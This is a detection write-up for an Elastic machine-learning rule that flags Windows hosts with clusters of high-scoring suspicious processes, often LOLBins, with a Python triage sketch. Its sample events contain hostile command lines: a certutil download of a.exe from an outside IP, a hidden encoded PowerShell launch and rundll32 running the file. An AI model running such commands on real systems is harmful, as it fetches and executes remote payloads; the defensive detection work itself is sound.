Host Detected with Suspicious Windows Process(es)
A machine learning job combination has identified a host with one or more suspicious Windows processes that exhibit unusually high malicious probability scores, indicating potential masquerading tactics for defense evasion.
The rule combines a supervised ProblemChild model, which scores each Windows process event with a probability of being malicious, with an unsupervised anomaly detection job that flags hosts whose summed scores are unusually high. The signal is a cluster of high-scoring processes on one host, often involving LOLBins, and the aim is to catch masquerading activity that conventional search-based rules would miss. The rule relies on the ‘problem_child_high_sum_by_host_ea’ machine learning job, requires a minimum Elastic Stack version of 9.4.0, and uses process events ingested by the Elastic Defend or Winlogbeat integrations.
Attack Chain
- Initial access is achieved through methods not specified in this source.
- The attacker executes a legitimate Windows binary (LOLBin) such as cmd.exe, powershell.exe or certutil.exe.
- The LOLBin is used to execute a malicious command or script.
- The ProblemChild supervised ML model predicts that the process is malicious based on its behavior.
- An unsupervised ML model analyzes the aggregate score of the process cluster, identifying it as unusually high.
- The detection rule triggers, flagging the host as having suspicious processes.
- An analyst reviews the alert and investigates the flagged processes.
- If the alert is missed or the response is slow, the attacker continues acting on the compromised host, potentially leading to data exfiltration or other malicious activity.
Impact
Because LOLBins are signed, expected system binaries, their abuse blends into normal activity and evades signature- and search-based detection, letting an attacker run code and move toward sensitive systems and data without tripping conventional rules. The consequences are data breaches, financial loss, and reputational damage. No victim count is given; any organization running Windows endpoints is a potential target.
Recommendation
- Ensure the Living off the Land (LotL) Attack Detection integration assets are installed, along with Windows process events collected by Elastic Defend or Winlogbeat, as required by the setup instructions.
- Review the host name associated with the suspicious process cluster as described in the investigation guide.
- Examine the specific processes flagged by the ProblemChild supervised ML model and identify any known LOLBins among them, checking their command lines and parent processes, as described in the investigation guide.
- Implement application allowlisting to prevent unauthorized or suspicious processes from executing, as mentioned in the response and remediation steps; note that LOLBins are themselves allowed binaries, so allowlisting must be paired with command-line and parent-process restrictions to constrain their abuse.
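The two ML steps in the attack chain above (a supervised per-process malicious probability, then an aggregate-by-host check for an unusually high sum) and the triage steps in the recommendations (review the host, then the flagged processes and which are LOLBins) can be sketched in code. The following is an added example written for this page, not Elastic's ProblemChild model, ML job or rule code: the enrichment field name `problemchild.prediction_probability`, the flattened ECS-style event shape, the LOLBin list, the median + MAD cutoff used as a stand-in for the unsupervised job, and all sample events are assumptions or constructed data.

```python
"""Toy reconstruction of the ProblemChild rule logic for illustration only.
Field names and the anomaly method are assumptions, not Elastic's code."""
import json
from collections import defaultdict
from statistics import median

# Illustrative subset of binaries commonly abused as LOLBins (constructed list).
KNOWN_LOLBINS = {
    "cmd.exe", "powershell.exe", "certutil.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
}


def ev(host, name, cmd, prob):
    """Build one flattened, ECS-style process event. The enrichment field
    'problemchild.prediction_probability' is an assumed name for the
    supervised model's output."""
    return {"host.name": host, "process.name": name,
            "process.command_line": cmd,
            "problemchild.prediction_probability": prob}


# Constructed sample window: five ordinary workstations and one (ws-06) on
# which a chain of LOLBins was scored as highly likely malicious.
SAMPLE_EVENTS = [
    ev("ws-01", "explorer.exe", "explorer.exe", 0.02),
    ev("ws-01", "chrome.exe", "chrome.exe", 0.03),
    ev("ws-01", "outlook.exe", "outlook.exe", 0.04),
    ev("ws-02", "explorer.exe", "explorer.exe", 0.02),
    ev("ws-02", "teams.exe", "teams.exe", 0.05),
    ev("ws-02", "svchost.exe", "svchost.exe -k netsvcs", 0.01),
    ev("ws-03", "explorer.exe", "explorer.exe", 0.02),
    ev("ws-03", "winword.exe", "winword.exe report.docx", 0.06),
    ev("ws-03", "cmd.exe", "cmd.exe /c dir", 0.12),
    ev("ws-04", "explorer.exe", "explorer.exe", 0.01),
    ev("ws-04", "excel.exe", "excel.exe budget.xlsx", 0.05),
    ev("ws-05", "explorer.exe", "explorer.exe", 0.02),
    ev("ws-05", "powershell.exe", "powershell.exe Get-Process", 0.30),
    ev("ws-06", "explorer.exe", "explorer.exe", 0.02),
    ev("ws-06", "cmd.exe",
       "cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.txt a.exe", 0.91),
    ev("ws-06", "certutil.exe",
       "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.exe", 0.97),
    ev("ws-06", "powershell.exe", "powershell.exe -nop -w hidden -enc <b64>", 0.88),
    ev("ws-06", "rundll32.exe", "rundll32.exe a.exe,Start", 0.85),
]


def sum_scores_by_host(events):
    """Aggregate step: per host, sum the supervised model's malicious
    probability over that host's process events. This is the quantity an
    ML job named *_high_sum_by_host would watch."""
    sums = defaultdict(float)
    for e in events:
        sums[e["host.name"]] += e["problemchild.prediction_probability"]
    return dict(sums)


def robust_cutoff(sums, k=3.0):
    """Median + k * MAD of all hosts' sums: a simplified, fleet-wide stand-in
    for the unsupervised job's notion of 'unusually high' (the real job
    models each host's sum over time). If every host has the same sum the
    MAD is 0, the cutoff collapses to the median and nothing is flagged."""
    vals = list(sums.values())
    med = median(vals)
    mad = median(abs(v - med) for v in vals)
    return med + k * mad


def anomalous_hosts(sums, k=3.0):
    """Hosts whose summed score lies above the robust cutoff."""
    cutoff = robust_cutoff(sums, k)
    return {h for h, s in sums.items() if s > cutoff}


def triage(events, malicious_threshold=0.5, k=3.0):
    """End-to-end rule logic plus the analyst's first triage step: for each
    anomalous host, list the processes the supervised model classed as
    malicious (probability >= 0.5, i.e. prediction 1) and mark the known
    LOLBins among them, with command lines for review."""
    sums = sum_scores_by_host(events)
    report = {}
    for host in sorted(anomalous_hosts(sums, k)):
        procs = [e for e in events
                 if e["host.name"] == host
                 and e["problemchild.prediction_probability"] >= malicious_threshold]
        report[host] = {
            "score_sum": round(sums[host], 2),
            "processes": [{"name": e["process.name"],
                           "command_line": e["process.command_line"],
                           "probability": e["problemchild.prediction_probability"],
                           "lolbin": e["process.name"].lower() in KNOWN_LOLBINS}
                          for e in procs],
        }
    return report


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

On the constructed window only ws-06 crosses the cutoff: ws-05 has a single mid-scoring PowerShell event and stays below it, which is the point of aggregating by host rather than alerting on every process the supervised model finds slightly odd. The four processes listed for ws-06 are all known LOLBins, so the analyst's next step is the command-line review the investigation guide calls for.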
Detection coverage (2 rules)
- Detect Windows Processes Identified as Suspicious by ProblemChild Model (severity: low): detects Windows processes flagged as suspicious by the ProblemChild supervised ML model.
- Detect LOLBins Execution (severity: low): detects execution of commonly used LOLBins (Living Off The Land Binaries).